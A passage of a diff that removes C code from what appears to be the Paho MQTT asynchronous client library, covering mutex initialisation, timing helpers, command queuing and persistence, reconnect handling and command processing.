-	pthread_mutexattr_settype(&attr, PTHREAD_MUTEX_ERRORCHECK);
-#else
-	/* #warning "no pthread_mutexattr_settype" */
-#endif
-	if ((rc = pthread_mutex_init(mqttasync_mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing async_mutex\n", rc);
-	if ((rc = pthread_mutex_init(mqttcommand_mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing command_mutex\n", rc);
-	if ((rc = pthread_mutex_init(socket_mutex, &attr)) != 0)
-		printf("MQTTClient: error %d initializing socket_mutex\n", rc);
-
-	if ((rc = pthread_cond_init(&send_cond->cond, NULL)) != 0)
-		printf("MQTTAsync: error %d initializing send_cond cond\n", rc);
-	if ((rc = pthread_mutex_init(&send_cond->mutex, &attr)) != 0)
-		printf("MQTTAsync: error %d initializing send_cond mutex\n", rc);
-}
-
-#define WINAPI
-#endif
-
-static volatile int initialized = 0;
-static List* handles = NULL;
-static int tostop = 0;
-static List* commands = NULL;
-
-
-#if defined(WIN32) || defined(WIN64)
-#define START_TIME_TYPE DWORD
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	return GetTickCount();
-}
-#elif defined(AIX)
-#define START_TIME_TYPE struct timespec
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	static struct timespec start;
-	clock_gettime(CLOCK_REALTIME, &start);
-	return start;
-}
-#else
-#define START_TIME_TYPE struct timeval
-START_TIME_TYPE MQTTAsync_start_clock(void)
-{
-	static struct timeval start;
-	gettimeofday(&start, NULL);
-	return start;
-}
-#endif
-
-
-#if defined(WIN32) || defined(WIN64)
-long MQTTAsync_elapsed(DWORD milliseconds)
-{
-	return GetTickCount() - milliseconds;
-}
-#elif defined(AIX)
-#define assert(a)
-long MQTTAsync_elapsed(struct timespec start)
-{
-	struct timespec now, res;
-
-	clock_gettime(CLOCK_REALTIME, &now);
-	ntimersub(now, start, res);
-	return (res.tv_sec)*1000L + (res.tv_nsec)/1000000L;
-}
-#else
-long MQTTAsync_elapsed(struct timeval start)
-{
-	struct timeval now, res;
-
-	gettimeofday(&now, NULL);
-	timersub(&now, &start, &res);
-	return (res.tv_sec)*1000 + (res.tv_usec)/1000;
-}
-#endif
-
-
-typedef struct
-{
-	MQTTAsync_message* msg;
-	char* topicName;
-	int topicLen;
-	unsigned int seqno; /* only used on restore */
-} qEntry;
-
-typedef struct
-{
-	int type;
-	MQTTAsync_onSuccess* onSuccess;
-	MQTTAsync_onFailure* onFailure;
-	MQTTAsync_token token;
-	void* context;
-	START_TIME_TYPE start_time;
-	union
-	{
-		struct
-		{
-			int count;
-			char** topics;
-			int* qoss;
-		} sub;
-		struct
-		{
-			int count;
-			char** topics;
-		} unsub;
-		struct
-		{
-			char* destinationName;
-			int payloadlen;
-			void* payload;
-			int qos;
-			int retained;
-		} pub;
-		struct
-		{
-			int internal;
-			int timeout;
-		} dis;
-		struct
-		{
-			int currentURI;
-			int MQTTVersion; /**< current MQTT version being used to connect */
-		} conn;
-	} details;
-} MQTTAsync_command;
-
-
-typedef struct MQTTAsync_struct
-{
-	char* serverURI;
-	int ssl;
-	Clients* c;
-
-	/* "Global", to the client, callback definitions */
-	MQTTAsync_connectionLost* cl;
-	MQTTAsync_messageArrived* ma;
-	MQTTAsync_deliveryComplete* dc;
-	void* context; /* the context to be associated with the main callbacks*/
-
-	MQTTAsync_connected* connected;
-	void* connected_context; /* the context to be associated with the connected callback*/
-
-	/* Each time connect is called, we store the options that were used.  These are reused in
-	   any call to reconnect, or an automatic reconnect attempt */
-	MQTTAsync_command connect;		/* Connect operation properties */
-	MQTTAsync_command disconnect;		/* Disconnect operation properties */
-	MQTTAsync_command* pending_write;       /* Is there a socket write pending? */
-
-	List* responses;
-	unsigned int command_seqno;
-
-	MQTTPacket* pack;
-
-	/* added for offline buffering */
-	MQTTAsync_createOptions* createOptions;
-	int shouldBeConnected;
-
-	/* added for automatic reconnect */
-	int automaticReconnect;
-	int minRetryInterval;
-	int maxRetryInterval;
-	int serverURIcount;
-	char** serverURIs;
-	int connectTimeout;
-
-	int currentInterval;
-	START_TIME_TYPE lastConnectionFailedTime;
-	int retrying;
-	int reconnectNow;
-
-} MQTTAsyncs;
-
-
-typedef struct
-{
-	MQTTAsync_command command;
-	MQTTAsyncs* client;
-	unsigned int seqno; /* only used on restore */
-} MQTTAsync_queuedCommand;
-
-
-static int clientSockCompare(void* a, void* b);
-static void MQTTAsync_lock_mutex(mutex_type amutex);
-static void MQTTAsync_unlock_mutex(mutex_type amutex);
-static int MQTTAsync_checkConn(MQTTAsync_command* command, MQTTAsyncs* client);
-static void MQTTAsync_terminate(void);
-#if !defined(NO_PERSISTENCE)
-static int MQTTAsync_unpersistCommand(MQTTAsync_queuedCommand* qcmd);
-static int MQTTAsync_persistCommand(MQTTAsync_queuedCommand* qcmd);
-static MQTTAsync_queuedCommand* MQTTAsync_restoreCommand(char* buffer, int buflen);
-/*static void MQTTAsync_insertInOrder(List* list, void* content, int size);*/
-static int MQTTAsync_restoreCommands(MQTTAsyncs* client);
-#endif
-static int MQTTAsync_addCommand(MQTTAsync_queuedCommand* command, int command_size);
-static void MQTTAsync_startConnectRetry(MQTTAsyncs* m);
-static void MQTTAsync_checkDisconnect(MQTTAsync handle, MQTTAsync_command* command);
-static void MQTTProtocol_checkPendingWrites(void);
-static void MQTTAsync_freeServerURIs(MQTTAsyncs* m);
-static void MQTTAsync_freeCommand1(MQTTAsync_queuedCommand *command);
-static void MQTTAsync_freeCommand(MQTTAsync_queuedCommand *command);
-static void MQTTAsync_writeComplete(int socket);
-static int MQTTAsync_processCommand(void);
-static void MQTTAsync_checkTimeouts(void);
-static thread_return_type WINAPI MQTTAsync_sendThread(void* n);
-static void MQTTAsync_emptyMessageQueue(Clients* client);
-static void MQTTAsync_removeResponsesAndCommands(MQTTAsyncs* m);
-static int MQTTAsync_completeConnection(MQTTAsyncs* m, MQTTPacket* pack);
-static thread_return_type WINAPI MQTTAsync_receiveThread(void* n);
-static void MQTTAsync_stop(void);
-static void MQTTAsync_closeOnly(Clients* client);
-static void MQTTAsync_closeSession(Clients* client);
-static int clientStructCompare(void* a, void* b);
-static int MQTTAsync_cleanSession(Clients* client);
-static int MQTTAsync_deliverMessage(MQTTAsyncs* m, char* topicName, size_t topicLen, MQTTAsync_message* mm);
-static int MQTTAsync_disconnect1(MQTTAsync handle, const MQTTAsync_disconnectOptions* options, int internal);
-static int MQTTAsync_disconnect_internal(MQTTAsync handle, int timeout);
-static int cmdMessageIDCompare(void* a, void* b);
-static int MQTTAsync_assignMsgId(MQTTAsyncs* m);
-static int MQTTAsync_countBufferedMessages(MQTTAsyncs* m);
-static void MQTTAsync_retry(void);
-static int MQTTAsync_connecting(MQTTAsyncs* m);
-static MQTTPacket* MQTTAsync_cycle(int* sock, unsigned long timeout, int* rc);
-/*static int pubCompare(void* a, void* b);*/
-
-
-void MQTTAsync_sleep(long milliseconds)
-{
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	Sleep(milliseconds);
-#else
-	usleep(milliseconds*1000);
-#endif
-	FUNC_EXIT;
-}
-
-
-/**
- * List callback function for comparing clients by socket
- * @param a first integer value
- * @param b second integer value
- * @return boolean indicating whether a and b are equal
- */
-static int clientSockCompare(void* a, void* b)
-{
-	MQTTAsyncs* m = (MQTTAsyncs*)a;
-	return m->c->net.socket == *(int*)b;
-}
-
-
-static void MQTTAsync_lock_mutex(mutex_type amutex)
-{
-	int rc = Thread_lock_mutex(amutex);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %s locking mutex", strerror(rc));
-}
-
-
-static void MQTTAsync_unlock_mutex(mutex_type amutex)
-{
-	int rc = Thread_unlock_mutex(amutex);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %s unlocking mutex", strerror(rc));
-}
-
-
-/*
-  Check whether there are any more connect options.  If not then we are finished
-  with connect attempts.
-*/
-static int MQTTAsync_checkConn(MQTTAsync_command* command, MQTTAsyncs* client)
-{
-	int rc;
-
-	FUNC_ENTRY;
-	rc = command->details.conn.currentURI + 1 < client->serverURIcount ||
-		(command->details.conn.MQTTVersion == 4 && client->c->MQTTVersion == MQTTVERSION_DEFAULT);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_createWithOptions(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context,  MQTTAsync_createOptions* options)
-{
-	int rc = 0;
-	MQTTAsyncs *m = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (serverURI == NULL || clientId == NULL)
-	{
-		rc = MQTTASYNC_NULL_PARAMETER;
-		goto exit;
-	}
-
-	if (!UTF8_validateString(clientId))
-	{
-		rc = MQTTASYNC_BAD_UTF8_STRING;
-		goto exit;
-	}
-
-	if (options && (strncmp(options->struct_id, "MQCO", 4) != 0 || options->struct_version != 0))
-	{
-		rc = MQTTASYNC_BAD_STRUCTURE;
-		goto exit;
-	}
-
-	if (!initialized)
-	{
-		#if defined(HEAP_H)
-			Heap_initialize();
-		#endif
-		Log_initialize((Log_nameValue*)MQTTAsync_getVersionInfo());
-		bstate->clients = ListInitialize();
-		Socket_outInitialize();
-		Socket_setWriteCompleteCallback(MQTTAsync_writeComplete);
-		handles = ListInitialize();
-		commands = ListInitialize();
-#if defined(OPENSSL)
-		SSLSocket_initialize();
-#endif
-		initialized = 1;
-	}
-	m = malloc(sizeof(MQTTAsyncs));
-	*handle = m;
-	memset(m, '\0', sizeof(MQTTAsyncs));
-	if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-		serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-	else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-	{
-		serverURI += strlen(URI_SSL);
-		m->ssl = 1;
-	}
-#endif
-	m->serverURI = MQTTStrdup(serverURI);
-	m->responses = ListInitialize();
-	ListAppend(handles, m, sizeof(MQTTAsyncs));
-
-	m->c = malloc(sizeof(Clients));
-	memset(m->c, '\0', sizeof(Clients));
-	m->c->context = m;
-	m->c->outboundMsgs = ListInitialize();
-	m->c->inboundMsgs = ListInitialize();
-	m->c->messageQueue = ListInitialize();
-	m->c->clientID = MQTTStrdup(clientId);
-
-	m->shouldBeConnected = 0;
-	if (options)
-	{
-		m->createOptions = malloc(sizeof(MQTTAsync_createOptions));
-		memcpy(m->createOptions, options, sizeof(MQTTAsync_createOptions));
-	}
-
-#if !defined(NO_PERSISTENCE)
-	rc = MQTTPersistence_create(&(m->c->persistence), persistence_type, persistence_context);
-	if (rc == 0)
-	{
-		rc = MQTTPersistence_initialize(m->c, m->serverURI);
-		if (rc == 0)
-		{
-			MQTTAsync_restoreCommands(m);
-			MQTTPersistence_restoreMessageQueue(m->c);
-		}
-	}
-#endif
-	ListAppend(bstate->clients, m->c, sizeof(Clients) + 3*sizeof(List));
-
-exit:
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int MQTTAsync_create(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context)
-{
-	return MQTTAsync_createWithOptions(handle, serverURI, clientId, persistence_type,
-		persistence_context, NULL);
-}
-
-
-static void MQTTAsync_terminate(void)
-{
-	FUNC_ENTRY;
-	MQTTAsync_stop();
-	if (initialized)
-	{
-		ListElement* elem = NULL;
-		ListFree(bstate->clients);
-		ListFree(handles);
-		while (ListNextElement(commands, &elem))
-			MQTTAsync_freeCommand1((MQTTAsync_queuedCommand*)(elem->content));
-		ListFree(commands);
-		handles = NULL;
-		Socket_outTerminate();
-#if defined(OPENSSL)
-		SSLSocket_terminate();
-#endif
-		#if defined(HEAP_H)
-			Heap_terminate();
-		#endif
-		Log_terminate();
-		initialized = 0;
-	}
-	FUNC_EXIT;
-}
-
-
-#if !defined(NO_PERSISTENCE)
-static int MQTTAsync_unpersistCommand(MQTTAsync_queuedCommand* qcmd)
-{
-	int rc = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-
-	FUNC_ENTRY;
-	sprintf(key, "%s%u", PERSISTENCE_COMMAND_KEY, qcmd->seqno);
-	if ((rc = qcmd->client->c->persistence->premove(qcmd->client->c->phandle, key)) != 0)
-		Log(LOG_ERROR, 0, "Error %d removing command from persistence", rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static int MQTTAsync_persistCommand(MQTTAsync_queuedCommand* qcmd)
-{
-	int rc = 0;
-	MQTTAsyncs* aclient = qcmd->client;
-	MQTTAsync_command* command = &qcmd->command;
-	int* lens = NULL;
-	void** bufs = NULL;
-	int bufindex = 0, i, nbufs = 0;
-	char key[PERSISTENCE_MAX_KEY_LENGTH + 1];
-
-	FUNC_ENTRY;
-	switch (command->type)
-	{
-		case SUBSCRIBE:
-			nbufs = 3 + (command->details.sub.count * 2);
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = &command->details.sub.count;
-			lens[bufindex++] = sizeof(command->details.sub.count);
-
-			for (i = 0; i < command->details.sub.count; ++i)
-			{
-				bufs[bufindex] = command->details.sub.topics[i];
-				lens[bufindex++] = (int)strlen(command->details.sub.topics[i]) + 1;
-				bufs[bufindex] = &command->details.sub.qoss[i];
-				lens[bufindex++] = sizeof(command->details.sub.qoss[i]);
-			}
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-
-		case UNSUBSCRIBE:
-			nbufs = 3 + command->details.unsub.count;
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = &command->details.unsub.count;
-			lens[bufindex++] = sizeof(command->details.unsub.count);
-
-			for (i = 0; i < command->details.unsub.count; ++i)
-			{
-				bufs[bufindex] = command->details.unsub.topics[i];
-				lens[bufindex++] = (int)strlen(command->details.unsub.topics[i]) + 1;
-			}
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-
-		case PUBLISH:
-			nbufs = 7;
-
-			lens = (int*)malloc(nbufs * sizeof(int));
-			bufs = malloc(nbufs * sizeof(char *));
-
-			bufs[bufindex] = &command->type;
-			lens[bufindex++] = sizeof(command->type);
-
-			bufs[bufindex] = &command->token;
-			lens[bufindex++] = sizeof(command->token);
-
-			bufs[bufindex] = command->details.pub.destinationName;
-			lens[bufindex++] = (int)strlen(command->details.pub.destinationName) + 1;
-
-			bufs[bufindex] = &command->details.pub.payloadlen;
-			lens[bufindex++] = sizeof(command->details.pub.payloadlen);
-
-			bufs[bufindex] = command->details.pub.payload;
-			lens[bufindex++] = command->details.pub.payloadlen;
-
-			bufs[bufindex] = &command->details.pub.qos;
-			lens[bufindex++] = sizeof(command->details.pub.qos);
-
-			bufs[bufindex] = &command->details.pub.retained;
-			lens[bufindex++] = sizeof(command->details.pub.retained);
-
-			sprintf(key, "%s%d", PERSISTENCE_COMMAND_KEY, ++aclient->command_seqno);
-			break;
-	}
-	if (nbufs > 0)
-	{
-		if ((rc = aclient->c->persistence->pput(aclient->c->phandle, key, nbufs, (char**)bufs, lens)) != 0)
-			Log(LOG_ERROR, 0, "Error persisting command, rc %d", rc);
-		qcmd->seqno = aclient->command_seqno;
-	}
-	if (lens)
-		free(lens);
-	if (bufs)
-		free(bufs);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static MQTTAsync_queuedCommand* MQTTAsync_restoreCommand(char* buffer, int buflen)
-{
-	MQTTAsync_command* command = NULL;
-	MQTTAsync_queuedCommand* qcommand = NULL;
-	char* ptr = buffer;
-	int i;
-	size_t data_size;
-
-	FUNC_ENTRY;
-	qcommand = malloc(sizeof(MQTTAsync_queuedCommand));
-	memset(qcommand, '\0', sizeof(MQTTAsync_queuedCommand));
-	command = &qcommand->command;
-
-	command->type = *(int*)ptr;
-	ptr += sizeof(int);
-
-	command->token = *(MQTTAsync_token*)ptr;
-	ptr += sizeof(MQTTAsync_token);
-
-	switch (command->type)
-	{
-		case SUBSCRIBE:
-			command->details.sub.count = *(int*)ptr;
-			ptr += sizeof(int);
-			
-			if (command->details.sub.count > 0)
-			{
-					command->details.sub.topics = (char **)malloc(sizeof(char *) * command->details.sub.count);
-					command->details.sub.qoss = (int *)malloc(sizeof(int) * command->details.sub.count);
-			}
-
-			for (i = 0; i < command->details.sub.count; ++i)
-			{
-				data_size = strlen(ptr) + 1;
-
-				command->details.sub.topics[i] = malloc(data_size);
-				strcpy(command->details.sub.topics[i], ptr);
-				ptr += data_size;
-
-				command->details.sub.qoss[i] = *(int*)ptr;
-				ptr += sizeof(int);
-			}
-			break;
-
-		case UNSUBSCRIBE:
-			command->details.unsub.count = *(int*)ptr;
-			ptr += sizeof(int);
-			
-			if (command->details.unsub.count > 0)
-			{
-					command->details.unsub.topics = (char **)malloc(sizeof(char *) * command->details.unsub.count);					
-			}
-
-			for (i = 0; i < command->details.unsub.count; ++i)
-			{
-				data_size = strlen(ptr) + 1;
-
-				command->details.unsub.topics[i] = malloc(data_size);
-				strcpy(command->details.unsub.topics[i], ptr);
-				ptr += data_size;
-			}
-			break;
-
-		case PUBLISH:
-			data_size = strlen(ptr) + 1;
-			command->details.pub.destinationName = malloc(data_size);
-			strcpy(command->details.pub.destinationName, ptr);
-			ptr += data_size;
-
-			command->details.pub.payloadlen = *(int*)ptr;
-			ptr += sizeof(int);
-
-			data_size = command->details.pub.payloadlen;
-			command->details.pub.payload = malloc(data_size);
-			memcpy(command->details.pub.payload, ptr, data_size);
-			ptr += data_size;
-
-			command->details.pub.qos = *(int*)ptr;
-			ptr += sizeof(int);
-
-			command->details.pub.retained = *(int*)ptr;
-			ptr += sizeof(int);
-			break;
-
-		default:
-			free(qcommand);
-			qcommand = NULL;
-
-	}
-
-	FUNC_EXIT;
-	return qcommand;
-}
-
-/*
-static void MQTTAsync_insertInOrder(List* list, void* content, int size)
-{
-	ListElement* index = NULL;
-	ListElement* current = NULL;
-
-	FUNC_ENTRY;
-	while (ListNextElement(list, &current) != NULL && index == NULL)
-	{
-		if (((MQTTAsync_queuedCommand*)content)->seqno < ((MQTTAsync_queuedCommand*)current->content)->seqno)
-			index = current;
-	}
-
-	ListInsert(list, content, size, index);
-	FUNC_EXIT;
-}*/
-
-
-static int MQTTAsync_restoreCommands(MQTTAsyncs* client)
-{
-	int rc = 0;
-	char **msgkeys;
-	int nkeys;
-	int i = 0;
-	Clients* c = client->c;
-	int commands_restored = 0;
-
-	FUNC_ENTRY;
-	if (c->persistence && (rc = c->persistence->pkeys(c->phandle, &msgkeys, &nkeys)) == 0)
-	{
-		while (rc == 0 && i < nkeys)
-		{
-			char *buffer = NULL;
-			int buflen;
-
-			if (strncmp(msgkeys[i], PERSISTENCE_COMMAND_KEY, strlen(PERSISTENCE_COMMAND_KEY)) != 0)
-			{
-				;
-			}
-			else if ((rc = c->persistence->pget(c->phandle, msgkeys[i], &buffer, &buflen)) == 0)
-			{
-				MQTTAsync_queuedCommand* cmd = MQTTAsync_restoreCommand(buffer, buflen);
-
-				if (cmd)
-				{
-					cmd->client = client;
-					cmd->seqno = atoi(msgkeys[i]+2);
-					MQTTPersistence_insertInOrder(commands, cmd, sizeof(MQTTAsync_queuedCommand));
-					free(buffer);
-					client->command_seqno = max(client->command_seqno, cmd->seqno);
-					commands_restored++;
-				}
-			}
-			if (msgkeys[i])
-				free(msgkeys[i]);
-			i++;
-		}
-		if (msgkeys != NULL)
-			free(msgkeys);
-	}
-	Log(TRACE_MINIMUM, -1, "%d commands restored for client %s", commands_restored, c->clientID);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
-
-
-static int MQTTAsync_addCommand(MQTTAsync_queuedCommand* command, int command_size)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttcommand_mutex);
-	/* Don't set start time if the connect command is already in process #218 */
-	if ((command->command.type != CONNECT) || (command->client->c->connect_state == 0))
-		command->command.start_time = MQTTAsync_start_clock();
-	if (command->command.type == CONNECT ||
-		(command->command.type == DISCONNECT && command->command.details.dis.internal))
-	{
-		MQTTAsync_queuedCommand* head = NULL;
-
-		if (commands->first)
-			head = (MQTTAsync_queuedCommand*)(commands->first->content);
-
-		if (head != NULL && head->client == command->client && head->command.type == command->command.type)
-			MQTTAsync_freeCommand(command); /* ignore duplicate connect or disconnect command */
-		else
-			ListInsert(commands, command, command_size, commands->first); /* add to the head of the list */
-	}
-	else
-	{
-		ListAppend(commands, command, command_size);
-#if !defined(NO_PERSISTENCE)
-		if (command->client->c->persistence)
-			MQTTAsync_persistCommand(command);
-#endif
-	}
-	MQTTAsync_unlock_mutex(mqttcommand_mutex);
-#if !defined(WIN32) && !defined(WIN64)
-	rc = Thread_signal_cond(send_cond);
-	if (rc != 0)
-		Log(LOG_ERROR, 0, "Error %d from signal cond", rc);
-#else
-	if (!Thread_check_sem(send_sem))
-		Thread_post_sem(send_sem);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_startConnectRetry(MQTTAsyncs* m)
-{
-	if (m->automaticReconnect && m->shouldBeConnected)
-	{
-		m->lastConnectionFailedTime = MQTTAsync_start_clock();
-		if (m->retrying)
-			m->currentInterval = min(m->currentInterval * 2, m->maxRetryInterval);
-		else
-		{
-			m->currentInterval = m->minRetryInterval;
-			m->retrying = 1;
-		}
-	}
-}
-
-
-int MQTTAsync_reconnect(MQTTAsync handle)
-{
-	int rc = MQTTASYNC_FAILURE;
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-
-	if (m->automaticReconnect)
-	{
-		if (m->shouldBeConnected)
-		{
-			m->reconnectNow = 1;
-	  		if (m->retrying == 0)
-	  		{
-	  			m->currentInterval = m->minRetryInterval;
-	  			m->retrying = 1;
-	  		}
-	  		rc = MQTTASYNC_SUCCESS;
-		}
-	}
-	else
-	{
-		/* to reconnect, put the connect command to the head of the command queue */
-		MQTTAsync_queuedCommand* conn = malloc(sizeof(MQTTAsync_queuedCommand));
-		memset(conn, '\0', sizeof(MQTTAsync_queuedCommand));
-		conn->client = m;
-		conn->command = m->connect;
-		/* make sure that the version attempts are restarted */
-		if (m->c->MQTTVersion == MQTTVERSION_DEFAULT)
-	  		conn->command.details.conn.MQTTVersion = 0;
-		MQTTAsync_addCommand(conn, sizeof(m->connect));
-	  	rc = MQTTASYNC_SUCCESS;
-	}
-
-	MQTTAsync_unlock_mutex(mqttasync_mutex);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-static void MQTTAsync_checkDisconnect(MQTTAsync handle, MQTTAsync_command* command)
-{
-	MQTTAsyncs* m = handle;
-
-	FUNC_ENTRY;
-	/* wait for all inflight message flows to finish, up to timeout */;
-	if (m->c->outboundMsgs->count == 0 || MQTTAsync_elapsed(command->start_time) >= command->details.dis.timeout)
-	{
-		int was_connected = m->c->connected;
-		MQTTAsync_closeSession(m->c);
-		if (command->details.dis.internal)
-		{
-			if (m->cl && was_connected)
-			{
-				Log(TRACE_MIN, -1, "Calling connectionLost for client %s", m->c->clientID);
-				(*(m->cl))(m->context, NULL);
-			}
-			MQTTAsync_startConnectRetry(m);
-		}
-		else if (command->onSuccess)
-		{
-			Log(TRACE_MIN, -1, "Calling disconnect complete for client %s", m->c->clientID);
-			(*(command->onSuccess))(command->context, NULL);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-/**
- * See if any pending writes have been completed, and cleanup if so.
- * Cleaning up means removing any publication data that was stored because the write did
- * not originally complete.
- */
-static void MQTTProtocol_checkPendingWrites(void)
-{
-	FUNC_ENTRY;
-	if (state.pending_writes.count > 0)
-	{
-		ListElement* le = state.pending_writes.first;
-		while (le)
-		{
-			if (Socket_noPendingWrites(((pending_write*)(le->content))->socket))
-			{
-				MQTTProtocol_removePublication(((pending_write*)(le->content))->p);
-				state.pending_writes.current = le;
-				ListRemove(&(state.pending_writes), le->content); /* does NextElement itself */
-				le = state.pending_writes.current;
-			}
-			else
-				ListNextElement(&(state.pending_writes), &le);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static void MQTTAsync_freeServerURIs(MQTTAsyncs* m)
-{
-	int i;
-
-	for (i = 0; i < m->serverURIcount; ++i)
-		free(m->serverURIs[i]);
-	if (m->serverURIs)
-		free(m->serverURIs);
-}
-
-
-static void MQTTAsync_freeCommand1(MQTTAsync_queuedCommand *command)
-{
-	if (command->command.type == SUBSCRIBE)
-	{
-		int i;
-
-		for (i = 0; i < command->command.details.sub.count; i++)
-			free(command->command.details.sub.topics[i]);
-
-		free(command->command.details.sub.topics);
-		free(command->command.details.sub.qoss);
-	}
-	else if (command->command.type == UNSUBSCRIBE)
-	{
-		int i;
-
-		for (i = 0; i < command->command.details.unsub.count; i++)
-			free(command->command.details.unsub.topics[i]);
-
-		free(command->command.details.unsub.topics);
-	}
-	else if (command->command.type == PUBLISH)
-	{
-		/* qos 1 and 2 topics are freed in the protocol code when the flows are completed */
-		if (command->command.details.pub.destinationName)
-			free(command->command.details.pub.destinationName);
-		free(command->command.details.pub.payload);
-	}
-}
-
-static void MQTTAsync_freeCommand(MQTTAsync_queuedCommand *command)
-{
-	MQTTAsync_freeCommand1(command);
-	free(command);
-}
-
-
-static void MQTTAsync_writeComplete(int socket)
-{
-	ListElement* found = NULL;
-
-	FUNC_ENTRY;
-	/* a partial write is now complete for a socket - this will be on a publish*/
-
-	MQTTProtocol_checkPendingWrites();
-
-	/* find the client using this socket */
-	if ((found = ListFindItem(handles, &socket, clientSockCompare)) != NULL)
-	{
-		MQTTAsyncs* m = (MQTTAsyncs*)(found->content);
-
-		time(&(m->c->net.lastSent));
-
-		/* see if there is a pending write flagged */
-		if (m->pending_write)
-		{
-			ListElement* cur_response = NULL;
-			MQTTAsync_command* command = m->pending_write;
-			MQTTAsync_queuedCommand* com = NULL;
-
-			while (ListNextElement(m->responses, &cur_response))
-			{
-				com = (MQTTAsync_queuedCommand*)(cur_response->content);
-				if (com->client->pending_write == m->pending_write)
-					break;
-			}
-
-			if (cur_response && command->onSuccess)
-			{
-				MQTTAsync_successData data;
-
-				data.token = command->token;
-				data.alt.pub.destinationName = command->details.pub.destinationName;
-				data.alt.pub.message.payload = command->details.pub.payload;
-				data.alt.pub.message.payloadlen = command->details.pub.payloadlen;
-				data.alt.pub.message.qos = command->details.pub.qos;
-				data.alt.pub.message.retained = command->details.pub.retained;
-				Log(TRACE_MIN, -1, "Calling publish success for client %s", m->c->clientID);
-				(*(command->onSuccess))(command->context, &data);
-			}
-			m->pending_write = NULL;
-
-			ListDetach(m->responses, com);
-			MQTTAsync_freeCommand(com);
-		}
-	}
-	FUNC_EXIT;
-}
-
-
-static int MQTTAsync_processCommand(void)
-{
-	int rc = 0;
-	MQTTAsync_queuedCommand* command = NULL;
-	ListElement* cur_command = NULL;
-	List* ignored_clients = NULL;
-
-	FUNC_ENTRY;
-	MQTTAsync_lock_mutex(mqttasync_mutex);
-	MQTTAsync_lock_mutex(mqttcommand_mutex);
-
-	/* only the first command in the list must be processed for any particular client, so if we skip
-	   a command for a client, we must skip all following commands for that client.  Use a list of
-	   ignored clients to keep track
-	*/
-	ignored_clients = ListInitialize();
-
-	/* don't try a command until there isn't a pending write for that client, and we are not connecting */
-	while (ListNextElement(commands, &cur_command))
-	{
-		MQTTAsync_queuedCommand* cmd = (MQTTAsync_queuedCommand*)(cur_command->content);
-
-		if (ListFind(ignored_clients, cmd->client))
-			continue;
-
-		if (cmd->command.type == CONNECT || cmd->command.type == DISCONNECT || (cmd->client->c->connected &&
-			cmd->client->c->connect_state == 0 && Socket_noPendingWrites(cmd->client->c->net.socket)))
-		{
-			if ((cmd->command.type == PUBLISH || cmd->command.type == SUBSCRIBE || cmd->command.type == UNSUBSCRIBE) &&
-				cmd->client->c->outboundMsgs->count >= MAX_MSG_ID - 1)
-			{
-				; /* no more message ids available */
-			}
-			else
-			{
-				command = cmd;
-				break;
-			}
-		}
-		ListAppend(ignored_clients, cmd->client, sizeof(cmd->client));
-	}
-	ListFreeNoContent(ignored_clients);
-	if (command)
-	{
-		ListDetach(commands, command);
-#if !defined(NO_PERSISTENCE)
-		if (command->client->c->persistence)
-			MQTTAsync_unpersistCommand(command);
-#endif
-	}
-	MQTTAsync_unlock_mutex(mqttcommand_mutex);
-
-	if (!command)
-		goto exit; /* nothing to do */
-
-	if (command->command.type == CONNECT)
-	{
-		if (command->client->c->connect_state != 0 || command->client->c->connected)
-			rc = 0;
-		else
-		{
-			char* serverURI = command->client->serverURI;
-
-			if (command->client->serverURIcount > 0)
-			{
-				serverURI = command->client->serverURIs[command->command.details.conn.currentURI];
-
-				if (strncmp(URI_TCP, serverURI, strlen(URI_TCP)) == 0)
-					serverURI += strlen(URI_TCP);
-#if defined(OPENSSL)
-				else if (strncmp(URI_SSL, serverURI, strlen(URI_SSL)) == 0)
-				{
-					serverURI += strlen(URI_SSL);
-					command->client->ssl = 1;
-				}
-#endif
-			}
-
-			if (command->client->c->MQTTVersion == MQTTVERSION_DEFAULT)
-			{
-				if (command->command.details.conn.MQTTVersion == 0)
-					command->command.details.conn.MQTTVersion = MQTTVERSION_3_1_1;
